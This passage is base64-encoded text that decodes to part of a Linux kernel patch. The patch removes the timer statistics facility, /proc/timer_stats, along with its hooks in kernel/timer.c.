Zmb3J0LgotICoKLSAqIHRpbWVyX3RvcC5jIGlzCi0gKglDb3B5cmlnaHQgKEMpIDIwMDUgSW5zdGl0dXRvIE5va2lhIGRlIFRlY25vbG9naWEgLSBJTmRUIC0gTWFuYXVzCi0gKglXcml0dGVuIGJ5IERhbmllbCBQZXRyaW5pIDxkLnBlbnNhdG9yQGdtYWlsLmNvbT4KLSAqCXRpbWVyX3RvcC5jIHdhcyByZWxlYXNlZCB1bmRlciB0aGUgR05VIEdlbmVyYWwgUHVibGljIExpY2Vuc2UgdmVyc2lvbiAyCi0gKgotICogV2UgZXhwb3J0IHRoZSBhZGRyZXNzZXMgYW5kIGNvdW50aW5nIG9mIHRpbWVyIGZ1bmN0aW9ucyBiZWluZyBjYWxsZWQsCi0gKiB0aGUgcGlkIGFuZCBjbWRsaW5lIGZyb20gdGhlIG93bmVyIHByb2Nlc3MgaWYgYXBwbGljYWJsZS4KLSAqCi0gKiBTdGFydC9zdG9wIGRhdGEgY29sbGVjdGlvbjoKLSAqICMgZWNobyBbMXwwXSA+L3Byb2MvdGltZXJfc3RhdHMKLSAqCi0gKiBEaXNwbGF5IHRoZSBpbmZvcm1hdGlvbiBjb2xsZWN0ZWQgc28gZmFyOgotICogIyBjYXQgL3Byb2MvdGltZXJfc3RhdHMKLSAqCi0gKiBUaGlzIHByb2dyYW0gaXMgZnJlZSBzb2Z0d2FyZTsgeW91IGNhbiByZWRpc3RyaWJ1dGUgaXQgYW5kL29yIG1vZGlmeQotICogaXQgdW5kZXIgdGhlIHRlcm1zIG9mIHRoZSBHTlUgR2VuZXJhbCBQdWJsaWMgTGljZW5zZSB2ZXJzaW9uIDIgYXMKLSAqIHB1Ymxpc2hlZCBieSB0aGUgRnJlZSBTb2Z0d2FyZSBGb3VuZGF0aW9uLgotICovCi0KLSNpbmNsdWRlIDxsaW51eC9wcm9jX2ZzLmg+Ci0jaW5jbHVkZSA8bGludXgvbW9kdWxlLmg+Ci0jaW5jbHVkZSA8bGludXgvc3BpbmxvY2suaD4KLSNpbmNsdWRlIDxsaW51eC9zY2hlZC5oPgotI2luY2x1ZGUgPGxpbnV4L3NlcV9maWxlLmg+Ci0jaW5jbHVkZSA8bGludXgva2FsbHN5bXMuaD4KLQotI2luY2x1ZGUgPGFzbS91YWNjZXNzLmg+Ci0KLS8qCi0gKiBUaGlzIGlzIG91ciBiYXNpYyB1bml0IG9mIGludGVyZXN0OiBhIHRpbWVyIGV4cGlyeSBldmVudCBpZGVudGlmaWVkCi0gKiBieSB0aGUgdGltZXIsIGl0cyBzdGFydC9leHBpcmUgZnVuY3Rpb25zIGFuZCB0aGUgUElEIG9mIHRoZSB0YXNrIHRoYXQKLSAqIHN0YXJ0ZWQgdGhlIHRpbWVyLiBXZSBjb3VudCB0aGUgbnVtYmVyIG9mIHRpbWVzIGFuIGV2ZW50IGhhcHBlbnM6Ci0gKi8KLXN0cnVjdCBlbnRyeSB7Ci0JLyoKLQkgKiBIYXNoIGxpc3Q6Ci0JICovCi0Jc3RydWN0IGVudHJ5CQkqbmV4dDsKLQotCS8qCi0JICogSGFzaCBrZXlzOgotCSAqLwotCXZvaWQJCQkqdGltZXI7Ci0Jdm9pZAkJCSpzdGFydF9mdW5jOwotCXZvaWQJCQkqZXhwaXJlX2Z1bmM7Ci0JcGlkX3QJCQlwaWQ7Ci0KLQkvKgotCSAqIE51bWJlciBvZiB0aW1lb3V0IGV2ZW50czoKLQkgKi8KLQl1bnNpZ25lZCBsb25nCQljb3VudDsKLQl1bnNpZ25lZCBpbnQJCXRpbWVyX2ZsYWc7Ci0KLQkvKgotCSAqIFdlIHNhdmUgdGhlIGNvbW1hbmQtbGluZSBzdHJpbmcgdG8gcHJlc2VydmUKLQkgKiB0aGlzIGluZm9ybWF0aW9uIHBhc3QgdGFzayBleGl0OgotCSAqLwotCWNoYXIJCQljb21tW1RBU0tfQ09NTV9MRU4gKyAxXTsKLQotfSBfX19fY2FjaGVsaW5lX2FsaWduZWRfaW5fc21wOwotCi0vKgotICogU3BpbmxvY2sgcHJvdGVjdGluZyB0aGUgdGFibGVzIC0gbm90IHRha2VuIGR1cmluZyBsb29rdXA6Ci0gKi8KLXN0YXRpYyBERUZJTkVfUkFXX1NQSU5MT0NLKHRhYmxlX2xvY2spOwotCi0vKgotICogUGVyLUNQVSBsb29rdXAgbG9ja3MgZm9yIGZhc3QgaGFzaCBsb29rdXA6Ci0gKi8KLXN0YXRpYyBERUZJTkVfUEVSX0NQVShyYXdfc3BpbmxvY2tfdCwgdHN0YXRzX2xvb2t1cF9sb2NrKTsKLQotLyoKLSAqIE11dGV4IHRvIHNlcmlhbGl6ZSBzdGF0ZSBjaGFuZ2VzIHdpdGggc2hvdy1zdGF0cyBhY3Rpdml0aWVzOgotICovCi1zdGF0aWMgREVGSU5FX01VVEVYKHNob3dfbXV0ZXgpOwotCi0vKgotICogQ29sbGVjdGlvbiBzdGF0dXMsIGFjdGl2ZS9pbmFjdGl2ZToKLSAqLwotaW50IF9fcmVhZF9tb3N0bHkgdGltZXJfc3RhdHNfYWN0aXZlOwotCi0vKgotICogQmVnaW5uaW5nL2VuZCB0aW1lc3RhbXBzIG9mIG1lYXN1cmVtZW50OgotICovCi1zdGF0aWMga3RpbWVfdCB0aW1lX3N0YXJ0LCB0aW1lX3N0b3A7Ci0KLS8qCi0gKiB0c3RhdCBlbnRyeSBzdHJ1Y3RzIG9ubHkgZ2V0IGFsbG9jYXRlZCB3aGlsZSBjb2xsZWN0aW9uIGlzCi0gKiBhY3RpdmUgYW5kIG5ldmVyIGZyZWVkIGR1cmluZyB0aGF0IHRpbWUgLSB0aGlzIHNpbXBsaWZpZXMKLSAqIHRoaW5ncyBxdWl0ZSBhIGJpdC4KLSAqCi0gKiBUaGV5IGdldCBmcmVlZCB3aGVuIGEgbmV3IGNvbGxlY3Rpb24gcGVyaW9kIGlzIHN0YXJ0ZWQuCi0gKi8KLSNkZWZpbmUgTUFYX0VOVFJJRVNfQklUUwkxMAotI2RlZmluZSBNQVhfRU5UUklFUwkJKDFVTCA8PCBNQVhfRU5UUklFU19CSVRTKQotCi1zdGF0aWMgdW5zaWduZWQgbG9uZyBucl9lbnRyaWVzOwotc3RhdGljIHN0cnVjdCBlbnRyeSBlbnRyaWVzW01BWF9FTlRSSUVTXTsKLQotc3RhdGljIGF0b21pY190IG92ZXJmbG93X2NvdW50OwotCi0vKgotICogVGhlIGVudHJpZXMgYXJlIGluIGEgaGFzaC10YWJsZSwgZm9yIGZhc3QgbG9va3VwOgotICovCi0jZGVmaW5lIFRTVEFUX0hBU0hfQklUUwkJKE1BWF9FTlRSSUVTX0JJVFMgLSAxKQotI2RlZmluZSBUU1RBVF9IQVNIX1NJWkUJCSgxVUwgPDwgVFNUQVRfSEFTSF9CSVRTKQotI2RlZmluZSBUU1RBVF9IQVNIX01BU0sJCShUU1RBVF9IQVNIX1NJWkUgLSAxKQotCi0jZGVmaW5lIF9fdHN0YXRfaGFzaGZuKGVudHJ5KQkJCQkJCVwKLQkoKCh1bnNpZ25lZCBsb25nKShlbnRyeSktPnRpbWVyICAgICAgIF4JCQkJXAotCSAgKHVuc2lnbmVkIGxvbmcpKGVudHJ5KS0+c3RhcnRfZnVuYyAgXgkJCQlcCi0JICAodW5zaWduZWQgbG9uZykoZW50cnkpLT5leHBpcmVfZnVuYyBeCQkJCVwKLQkgICh1bnNpZ25lZCBsb25nKShlbnRyeSktPnBpZAkJKSAmIFRTVEFUX0hBU0hfTUFTSykKLQotI2RlZmluZSB0c3RhdF9oYXNoZW50cnkoZW50cnkpCSh0c3RhdF9oYXNoX3RhYmxlICsgX190c3RhdF9oYXNoZm4oZW50cnkpKQotCi1zdGF0aWMgc3RydWN0IGVudHJ5ICp0c3RhdF9oYXNoX3RhYmxlW1RTVEFUX0hBU0hfU0laRV0gX19yZWFkX21vc3RseTsKLQotc3RhdGljIHZvaWQgcmVzZXRfZW50cmllcyh2b2lkKQotewotCW5yX2VudHJpZXMgPSAwOwotCW1lbXNldChlbnRyaWVzLCAwLCBzaXplb2YoZW50cmllcykpOwotCW1lbXNldCh0c3RhdF9oYXNoX3RhYmxlLCAwLCBzaXplb2YodHN0YXRfaGFzaF90YWJsZSkpOwotCWF0b21pY19zZXQoJm92ZXJmbG93X2NvdW50LCAwKTsKLX0KLQotc3RhdGljIHN0cnVjdCBlbnRyeSAqYWxsb2NfZW50cnkodm9pZCkKLXsKLQlpZiAobnJfZW50cmllcyA+PSBNQVhfRU5UUklFUykKLQkJcmV0dXJuIE5VTEw7Ci0KLQlyZXR1cm4gZW50cmllcyArIG5yX2VudHJpZXMrKzsKLX0KLQotc3RhdGljIGludCBtYXRjaF9lbnRyaWVzKHN0cnVjdCBlbnRyeSAqZW50cnkxLCBzdHJ1Y3QgZW50cnkgKmVudHJ5MikKLXsKLQlyZXR1cm4gZW50cnkxLT50aW1lciAgICAgICA9PSBlbnRyeTItPnRpbWVyCSAgJiYKLQkgICAgICAgZW50cnkxLT5zdGFydF9mdW5jICA9PSBlbnRyeTItPnN0YXJ0X2Z1bmMgICYmCi0JICAgICAgIGVudHJ5MS0+ZXhwaXJlX2Z1bmMgPT0gZW50cnkyLT5leHBpcmVfZnVuYyAmJgotCSAgICAgICBlbnRyeTEtPnBpZAkgICA9PSBlbnRyeTItPnBpZDsKLX0KLQotLyoKLSAqIExvb2sgdXAgd2hldGhlciBhbiBlbnRyeSBtYXRjaGluZyB0aGlzIGl0ZW0gaXMgcHJlc2VudAotICogaW4gdGhlIGhhc2ggYWxyZWFkeS4gTXVzdCBiZSBjYWxsZWQgd2l0aCBpcnFzIG9mZiBhbmQgdGhlCi0gKiBsb29rdXAgbG9jayBoZWxkOgotICovCi1zdGF0aWMgc3RydWN0IGVudHJ5ICp0c3RhdF9sb29rdXAoc3RydWN0IGVudHJ5ICplbnRyeSwgY2hhciAqY29tbSkKLXsKLQlzdHJ1Y3QgZW50cnkgKipoZWFkLCAqY3VyciwgKnByZXY7Ci0KLQloZWFkID0gdHN0YXRfaGFzaGVudHJ5KGVudHJ5KTsKLQljdXJyID0gKmhlYWQ7Ci0KLQkvKgotCSAqIFRoZSBmYXN0cGF0aCBpcyB3aGVuIHRoZSBlbnRyeSBpcyBhbHJlYWR5IGhhc2hlZCwKLQkgKiB3ZSBkbyB0aGlzIHdpdGggdGhlIGxvb2t1cCBsb2NrIGhlbGQsIGJ1dCB3aXRoIHRoZQotCSAqIHRhYmxlIGxvY2sgbm90IGhlbGQ6Ci0JICovCi0Jd2hpbGUgKGN1cnIpIHsKLQkJaWYgKG1hdGNoX2VudHJpZXMoY3VyciwgZW50cnkpKQotCQkJcmV0dXJuIGN1cnI7Ci0KLQkJY3VyciA9IGN1cnItPm5leHQ7Ci0JfQotCS8qCi0JICogU2xvd3BhdGg6IGFsbG9jYXRlLCBzZXQgdXAgYW5kIGxpbmsgYSBuZXcgaGFzaCBlbnRyeToKLQkgKi8KLQlwcmV2ID0gTlVMTDsKLQljdXJyID0gKmhlYWQ7Ci0KLQlyYXdfc3Bpbl9sb2NrKCZ0YWJsZV9sb2NrKTsKLQkvKgotCSAqIE1ha2Ugc3VyZSB3ZSBoYXZlIG5vdCByYWNlZCB3aXRoIGFub3RoZXIgQ1BVOgotCSAqLwotCXdoaWxlIChjdXJyKSB7Ci0JCWlmIChtYXRjaF9lbnRyaWVzKGN1cnIsIGVudHJ5KSkKLQkJCWdvdG8gb3V0X3VubG9jazsKLQotCQlwcmV2ID0gY3VycjsKLQkJY3VyciA9IGN1cnItPm5leHQ7Ci0JfQotCi0JY3VyciA9IGFsbG9jX2VudHJ5KCk7Ci0JaWYgKGN1cnIpIHsKLQkJKmN1cnIgPSAqZW50cnk7Ci0JCWN1cnItPmNvdW50ID0gMDsKLQkJY3Vyci0+bmV4dCA9IE5VTEw7Ci0JCW1lbWNweShjdXJyLT5jb21tLCBjb21tLCBUQVNLX0NPTU1fTEVOKTsKLQotCQlzbXBfbWIoKTsgLyogRW5zdXJlIHRoYXQgY3VyciBpcyBpbml0aWFsaXplZCBiZWZvcmUgaW5zZXJ0ICovCi0KLQkJaWYgKHByZXYpCi0JCQlwcmV2LT5uZXh0ID0gY3VycjsKLQkJZWxzZQotCQkJKmhlYWQgPSBjdXJyOwotCX0KLSBvdXRfdW5sb2NrOgotCXJhd19zcGluX3VubG9jaygmdGFibGVfbG9jayk7Ci0KLQlyZXR1cm4gY3VycjsKLX0KLQotLyoqCi0gKiB0aW1lcl9zdGF0c191cGRhdGVfc3RhdHMgLSBVcGRhdGUgdGhlIHN0YXRpc3RpY3MgZm9yIGEgdGltZXIuCi0gKiBAdGltZXI6CXBvaW50ZXIgdG8gZWl0aGVyIGEgdGltZXJfbGlzdCBvciBhIGhydGltZXIKLSAqIEBwaWQ6CXRoZSBwaWQgb2YgdGhlIHRhc2sgd2hpY2ggc2V0IHVwIHRoZSB0aW1lcgotICogQHN0YXJ0ZjoJcG9pbnRlciB0byB0aGUgZnVuY3Rpb24gd2hpY2ggZGlkIHRoZSB0aW1lciBzZXR1cAotICogQHRpbWVyZjoJcG9pbnRlciB0byB0aGUgdGltZXIgY2FsbGJhY2sgZnVuY3Rpb24gb2YgdGhlIHRpbWVyCi0gKiBAY29tbToJbmFtZSBvZiB0aGUgcHJvY2VzcyB3aGljaCBzZXQgdXAgdGhlIHRpbWVyCi0gKgotICogV2hlbiB0aGUgdGltZXIgaXMgYWxyZWFkeSByZWdpc3RlcmVkLCB0aGVuIHRoZSBldmVudCBjb3VudGVyIGlzCi0gKiBpbmNyZW1lbnRlZC4gT3RoZXJ3aXNlIHRoZSB0aW1lciBpcyByZWdpc3RlcmVkIGluIGEgZnJlZSBzbG90LgotICovCi12b2lkIHRpbWVyX3N0YXRzX3VwZGF0ZV9zdGF0cyh2b2lkICp0aW1lciwgcGlkX3QgcGlkLCB2b2lkICpzdGFydGYsCi0JCQkgICAgICB2b2lkICp0aW1lcmYsIGNoYXIgKmNvbW0sCi0JCQkgICAgICB1bnNpZ25lZCBpbnQgdGltZXJfZmxhZykKLXsKLQkvKgotCSAqIEl0IGRvZXNuJ3QgbWF0dGVyIHdoaWNoIGxvY2sgd2UgdGFrZToKLQkgKi8KLQlyYXdfc3BpbmxvY2tfdCAqbG9jazsKLQlzdHJ1Y3QgZW50cnkgKmVudHJ5LCBpbnB1dDsKLQl1bnNpZ25lZCBsb25nIGZsYWdzOwotCi0JaWYgKGxpa2VseSghdGltZXJfc3RhdHNfYWN0aXZlKSkKLQkJcmV0dXJuOwotCi0JbG9jayA9ICZwZXJfY3B1KHRzdGF0c19sb29rdXBfbG9jaywgcmF3X3NtcF9wcm9jZXNzb3JfaWQoKSk7Ci0KLQlpbnB1dC50aW1lciA9IHRpbWVyOwotCWlucHV0LnN0YXJ0X2Z1bmMgPSBzdGFydGY7Ci0JaW5wdXQuZXhwaXJlX2Z1bmMgPSB0aW1lcmY7Ci0JaW5wdXQucGlkID0gcGlkOwotCWlucHV0LnRpbWVyX2ZsYWcgPSB0aW1lcl9mbGFnOwotCi0JcmF3X3NwaW5fbG9ja19pcnFzYXZlKGxvY2ssIGZsYWdzKTsKLQlpZiAoIXRpbWVyX3N0YXRzX2FjdGl2ZSkKLQkJZ290byBvdXRfdW5sb2NrOwotCi0JZW50cnkgPSB0c3RhdF9sb29rdXAoJmlucHV0LCBjb21tKTsKLQlpZiAobGlrZWx5KGVudHJ5KSkKLQkJZW50cnktPmNvdW50Kys7Ci0JZWxzZQotCQlhdG9taWNfaW5jKCZvdmVyZmxvd19jb3VudCk7Ci0KLSBvdXRfdW5sb2NrOgotCXJhd19zcGluX3VubG9ja19pcnFyZXN0b3JlKGxvY2ssIGZsYWdzKTsKLX0KLQotc3RhdGljIHZvaWQgcHJpbnRfbmFtZV9vZmZzZXQoc3RydWN0IHNlcV9maWxlICptLCB1bnNpZ25lZCBsb25nIGFkZHIpCi17Ci0JY2hhciBzeW1uYW1lW0tTWU1fTkFNRV9MRU5dOwotCi0JaWYgKGxvb2t1cF9zeW1ib2xfbmFtZShhZGRyLCBzeW1uYW1lKSA8IDApCi0JCXNlcV9wcmludGYobSwgIjwlcD4iLCAodm9pZCAqKWFkZHIpOwotCWVsc2UKLQkJc2VxX3ByaW50ZihtLCAiJXMiLCBzeW1uYW1lKTsKLX0KLQotc3RhdGljIGludCB0c3RhdHNfc2hvdyhzdHJ1Y3Qgc2VxX2ZpbGUgKm0sIHZvaWQgKnYpCi17Ci0Jc3RydWN0IHRpbWVzcGVjIHBlcmlvZDsKLQlzdHJ1Y3QgZW50cnkgKmVudHJ5OwotCXVuc2lnbmVkIGxvbmcgbXM7Ci0JbG9uZyBldmVudHMgPSAwOwotCWt0aW1lX3QgdGltZTsKLQlpbnQgaTsKLQotCW11dGV4X2xvY2soJnNob3dfbXV0ZXgpOwotCS8qCi0JICogSWYgc3RpbGwgYWN0aXZlIHRoZW4gY2FsY3VsYXRlIHVwIHRvIG5vdzoKLQkgKi8KLQlpZiAodGltZXJfc3RhdHNfYWN0aXZlKQotCQl0aW1lX3N0b3AgPSBrdGltZV9nZXQoKTsKLQotCXRpbWUgPSBrdGltZV9zdWIodGltZV9zdG9wLCB0aW1lX3N0YXJ0KTsKLQotCXBlcmlvZCA9IGt0aW1lX3RvX3RpbWVzcGVjKHRpbWUpOwotCW1zID0gcGVyaW9kLnR2X25zZWMgLyAxMDAwMDAwOwotCi0Jc2VxX3B1dHMobSwgIlRpbWVyIFN0YXRzIFZlcnNpb246IHYwLjJcbiIpOwotCXNlcV9wcmludGYobSwgIlNhbXBsZSBwZXJpb2Q6ICVsZC4lMDNsZCBzXG4iLCBwZXJpb2QudHZfc2VjLCBtcyk7Ci0JaWYgKGF0b21pY19yZWFkKCZvdmVyZmxvd19jb3VudCkpCi0JCXNlcV9wcmludGYobSwgIk92ZXJmbG93OiAlZCBlbnRyaWVzXG4iLAotCQkJYXRvbWljX3JlYWQoJm92ZXJmbG93X2NvdW50KSk7Ci0KLQlmb3IgKGkgPSAwOyBpIDwgbnJfZW50cmllczsgaSsrKSB7Ci0JCWVudHJ5ID0gZW50cmllcyArIGk7Ci0gCQlpZiAoZW50cnktPnRpbWVyX2ZsYWcgJiBUSU1FUl9TVEFUU19GTEFHX0RFRkVSUkFCTEUpIHsKLQkJCXNlcV9wcmludGYobSwgIiU0bHVELCAlNWQgJS0xNnMgIiwKLQkJCQllbnRyeS0+Y291bnQsIGVudHJ5LT5waWQsIGVudHJ5LT5jb21tKTsKLQkJfSBlbHNlIHsKLQkJCXNlcV9wcmludGYobSwgIiAlNGx1LCAlNWQgJS0xNnMgIiwKLQkJCQllbnRyeS0+Y291bnQsIGVudHJ5LT5waWQsIGVudHJ5LT5jb21tKTsKLQkJfQotCi0JCXByaW50X25hbWVfb2Zmc2V0KG0sICh1bnNpZ25lZCBsb25nKWVudHJ5LT5zdGFydF9mdW5jKTsKLQkJc2VxX3B1dHMobSwgIiAoIik7Ci0JCXByaW50X25hbWVfb2Zmc2V0KG0sICh1bnNpZ25lZCBsb25nKWVudHJ5LT5leHBpcmVfZnVuYyk7Ci0JCXNlcV9wdXRzKG0sICIpXG4iKTsKLQotCQlldmVudHMgKz0gZW50cnktPmNvdW50OwotCX0KLQotCW1zICs9IHBlcmlvZC50dl9zZWMgKiAxMDAwOwotCWlmICghbXMpCi0JCW1zID0gMTsKLQotCWlmIChldmVudHMgJiYgcGVyaW9kLnR2X3NlYykKLQkJc2VxX3ByaW50ZihtLCAiJWxkIHRvdGFsIGV2ZW50cywgJWxkLiUwM2xkIGV2ZW50cy9zZWNcbiIsCi0JCQkgICBldmVudHMsIGV2ZW50cyAqIDEwMDAgLyBtcywKLQkJCSAgIChldmVudHMgKiAxMDAwMDAwIC8gbXMpICUgMTAwMCk7Ci0JZWxzZQotCQlzZXFfcHJpbnRmKG0sICIlbGQgdG90YWwgZXZlbnRzXG4iLCBldmVudHMpOwotCi0JbXV0ZXhfdW5sb2NrKCZzaG93X211dGV4KTsKLQotCXJldHVybiAwOwotfQotCi0vKgotICogQWZ0ZXIgYSBzdGF0ZSBjaGFuZ2UsIG1ha2Ugc3VyZSBhbGwgY29uY3VycmVudCBsb29rdXAvdXBkYXRlCi0gKiBhY3Rpdml0aWVzIGhhdmUgc3RvcHBlZDoKLSAqLwotc3RhdGljIHZvaWQgc3luY19hY2Nlc3Modm9pZCkKLXsKLQl1bnNpZ25lZCBsb25nIGZsYWdzOwotCWludCBjcHU7Ci0KLQlmb3JfZWFjaF9vbmxpbmVfY3B1KGNwdSkgewotCQlyYXdfc3BpbmxvY2tfdCAqbG9jayA9ICZwZXJfY3B1KHRzdGF0c19sb29rdXBfbG9jaywgY3B1KTsKLQotCQlyYXdfc3Bpbl9sb2NrX2lycXNhdmUobG9jaywgZmxhZ3MpOwotCQkvKiBub3RoaW5nICovCi0JCXJhd19zcGluX3VubG9ja19pcnFyZXN0b3JlKGxvY2ssIGZsYWdzKTsKLQl9Ci19Ci0KLXN0YXRpYyBzc2l6ZV90IHRzdGF0c193cml0ZShzdHJ1Y3QgZmlsZSAqZmlsZSwgY29uc3QgY2hhciBfX3VzZXIgKmJ1ZiwKLQkJCSAgICBzaXplX3QgY291bnQsIGxvZmZfdCAqb2ZmcykKLXsKLQljaGFyIGN0bFsyXTsKLQotCWlmIChjb3VudCAhPSAyIHx8ICpvZmZzKQotCQlyZXR1cm4gLUVJTlZBTDsKLQotCWlmIChjb3B5X2Zyb21fdXNlcihjdGwsIGJ1ZiwgY291bnQpKQotCQlyZXR1cm4gLUVGQVVMVDsKLQotCW11dGV4X2xvY2soJnNob3dfbXV0ZXgpOwotCXN3aXRjaCAoY3RsWzBdKSB7Ci0JY2FzZSAnMCc6Ci0JCWlmICh0aW1lcl9zdGF0c19hY3RpdmUpIHsKLQkJCXRpbWVyX3N0YXRzX2FjdGl2ZSA9IDA7Ci0JCQl0aW1lX3N0b3AgPSBrdGltZV9nZXQoKTsKLQkJCXN5bmNfYWNjZXNzKCk7Ci0JCX0KLQkJYnJlYWs7Ci0JY2FzZSAnMSc6Ci0JCWlmICghdGltZXJfc3RhdHNfYWN0aXZlKSB7Ci0JCQlyZXNldF9lbnRyaWVzKCk7Ci0JCQl0aW1lX3N0YXJ0ID0ga3RpbWVfZ2V0KCk7Ci0JCQlzbXBfbWIoKTsKLQkJCXRpbWVyX3N0YXRzX2FjdGl2ZSA9IDE7Ci0JCX0KLQkJYnJlYWs7Ci0JZGVmYXVsdDoKLQkJY291bnQgPSAtRUlOVkFMOwotCX0KLQltdXRleF91bmxvY2soJnNob3dfbXV0ZXgpOwotCi0JcmV0dXJuIGNvdW50OwotfQotCi1zdGF0aWMgaW50IHRzdGF0c19vcGVuKHN0cnVjdCBpbm9kZSAqaW5vZGUsIHN0cnVjdCBmaWxlICpmaWxwKQotewotCXJldHVybiBzaW5nbGVfb3BlbihmaWxwLCB0c3RhdHNfc2hvdywgTlVMTCk7Ci19Ci0KLXN0YXRpYyBjb25zdCBzdHJ1Y3QgZmlsZV9vcGVyYXRpb25zIHRzdGF0c19mb3BzID0gewotCS5vcGVuCQk9IHRzdGF0c19vcGVuLAotCS5yZWFkCQk9IHNlcV9yZWFkLAotCS53cml0ZQkJPSB0c3RhdHNfd3JpdGUsCi0JLmxsc2VlawkJPSBzZXFfbHNlZWssCi0JLnJlbGVhc2UJPSBzaW5nbGVfcmVsZWFzZSwKLX07Ci0KLXZvaWQgX19pbml0IGluaXRfdGltZXJfc3RhdHModm9pZCkKLXsKLQlpbnQgY3B1OwotCi0JZm9yX2VhY2hfcG9zc2libGVfY3B1KGNwdSkKLQkJcmF3X3NwaW5fbG9ja19pbml0KCZwZXJfY3B1KHRzdGF0c19sb29rdXBfbG9jaywgY3B1KSk7Ci19Ci0KLXN0YXRpYyBpbnQgX19pbml0IGluaXRfdHN0YXRzX3Byb2Nmcyh2b2lkKQotewotCXN0cnVjdCBwcm9jX2Rpcl9lbnRyeSAqcGU7Ci0KLQlwZSA9IHByb2NfY3JlYXRlKCJ0aW1lcl9zdGF0cyIsIDA2NDQsIE5VTEwsICZ0c3RhdHNfZm9wcyk7Ci0JaWYgKCFwZSkKLQkJcmV0dXJuIC1FTk9NRU07Ci0JcmV0dXJuIDA7Ci19Ci1fX2luaXRjYWxsKGluaXRfdHN0YXRzX3Byb2Nmcyk7CmRpZmYgLS1naXQgYS9rZXJuZWwvdGltZXIuYyBiL2tlcm5lbC90aW1lci5jCmluZGV4IDU3MzMwNzYuLjhiZmYwYTkgMTAwNjQ0Ci0tLSBhL2tlcm5lbC90aW1lci5jCisrKyBiL2tlcm5lbC90aW1lci5jCkBAIC0zOTcsMzQgKzM5Nyw2IEBACiAJfQogfQogCi0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi12b2lkIF9fdGltZXJfc3RhdHNfdGltZXJfc2V0X3N0YXJ0X2luZm8oc3RydWN0IHRpbWVyX2xpc3QgKnRpbWVyLCB2b2lkICphZGRyKQotewotCWlmICh0aW1lci0+c3RhcnRfc2l0ZSkKLQkJcmV0dXJuOwotCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBhZGRyOwotCW1lbWNweSh0aW1lci0+c3RhcnRfY29tbSwgY3VycmVudC0+Y29tbSwgVEFTS19DT01NX0xFTik7Ci0JdGltZXItPnN0YXJ0X3BpZCA9IGN1cnJlbnQtPnBpZDsKLX0KLQotc3RhdGljIHZvaWQgdGltZXJfc3RhdHNfYWNjb3VudF90aW1lcihzdHJ1Y3QgdGltZXJfbGlzdCAqdGltZXIpCi17Ci0JdW5zaWduZWQgaW50IGZsYWcgPSAwOwotCi0JaWYgKGxpa2VseSghdGltZXItPnN0YXJ0X3NpdGUpKQotCQlyZXR1cm47Ci0JaWYgKHVubGlrZWx5KHRiYXNlX2dldF9kZWZlcnJhYmxlKHRpbWVyLT5iYXNlKSkpCi0JCWZsYWcgfD0gVElNRVJfU1RBVFNfRkxBR19ERUZFUlJBQkxFOwotCi0JdGltZXJfc3RhdHNfdXBkYXRlX3N0YXRzKHRpbWVyLCB0aW1lci0+c3RhcnRfcGlkLCB0aW1lci0+c3RhcnRfc2l0ZSwKLQkJCQkgdGltZXItPmZ1bmN0aW9uLCB0aW1lci0+c3RhcnRfY29tbSwgZmxhZyk7Ci19Ci0KLSNlbHNlCi1zdGF0aWMgdm9pZCB0aW1lcl9zdGF0c19hY2NvdW50X3RpbWVyKHN0cnVjdCB0aW1lcl9saXN0ICp0aW1lcikge30KLSNlbmRpZgotCiAjaWZkZWYgQ09ORklHX0RFQlVHX09CSkVDVFNfVElNRVJTCiAKIHN0YXRpYyBzdHJ1Y3QgZGVidWdfb2JqX2Rlc2NyIHRpbWVyX2RlYnVnX2Rlc2NyOwpAQCAtNjM3LDExICs2MDksNiBAQAogCXRpbWVyLT5lbnRyeS5uZXh0ID0gTlVMTDsKIAl0aW1lci0+YmFzZSA9ICh2b2lkICopKCh1bnNpZ25lZCBsb25nKWJhc2UgfCBmbGFncyk7CiAJdGltZXItPnNsYWNrID0gLTE7Ci0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotCXRpbWVyLT5zdGFydF9waWQgPSAtMTsKLQltZW1zZXQodGltZXItPnN0YXJ0X2NvbW0sIDAsIFRBU0tfQ09NTV9MRU4pOwotI2VuZGlmCiAJbG9ja2RlcF9pbml0X21hcCgmdGltZXItPmxvY2tkZXBfbWFwLCBuYW1lLCBrZXksIDApOwogfQogCkBAIC03MzksNyArNzA2LDYgQEAKIAl1bnNpZ25lZCBsb25nIGZsYWdzOwogCWludCByZXQgPSAwICwgY3B1OwogCi0JdGltZXJfc3RhdHNfdGltZXJfc2V0X3N0YXJ0X2luZm8odGltZXIpOwogCUJVR19PTighdGltZXItPmZ1bmN0aW9uKTsKIAogCWJhc2UgPSBsb2NrX3RpbWVyX2Jhc2UodGltZXIsICZmbGFncyk7CkBAIC05NDMsNyArOTA5LDYgQEAKIAlzdHJ1Y3QgdHZlY19iYXNlICpiYXNlID0gcGVyX2NwdSh0dmVjX2Jhc2VzLCBjcHUpOwogCXVuc2lnbmVkIGxvbmcgZmxhZ3M7CiAKLQl0aW1lcl9zdGF0c190aW1lcl9zZXRfc3RhcnRfaW5mbyh0aW1lcik7CiAJQlVHX09OKHRpbWVyX3BlbmRpbmcodGltZXIpIHx8ICF0aW1lci0+ZnVuY3Rpb24pOwogCXNwaW5fbG9ja19pcnFzYXZlKCZiYXNlLT5sb2NrLCBmbGFncyk7CiAJdGltZXJfc2V0X2Jhc2UodGltZXIsIGJhc2UpOwpAQCAtOTgxLDcgKzk0Niw2IEBACiAKIAlkZWJ1Z19hc3NlcnRfaW5pdCh0aW1lcik7CiAKLQl0aW1lcl9zdGF0c190aW1lcl9jbGVhcl9zdGFydF9pbmZvKHRpbWVyKTsKIAlpZiAodGltZXJfcGVuZGluZyh0aW1lcikpIHsKIAkJYmFzZSA9IGxvY2tfdGltZXJfYmFzZSh0aW1lciwgJmZsYWdzKTsKIAkJcmV0ID0gZGV0YWNoX2lmX3BlbmRpbmcodGltZXIsIGJhc2UsIHRydWUpOwpAQCAtMTAwOSwxMCArOTczLDkgQEAKIAogCWJhc2UgPSBsb2NrX3RpbWVyX2Jhc2UodGltZXIsICZmbGFncyk7CiAKLQlpZiAoYmFzZS0+cnVubmluZ190aW1lciAhPSB0aW1lcikgewotCQl0aW1lcl9zdGF0c190aW1lcl9jbGVhcl9zdGFydF9pbmZvKHRpbWVyKTsKKwlpZiAoYmFzZS0+cnVubmluZ190aW1lciAhPSB0aW1lcikKIAkJcmV0ID0gZGV0YWNoX2lmX3BlbmRpbmcodGltZXI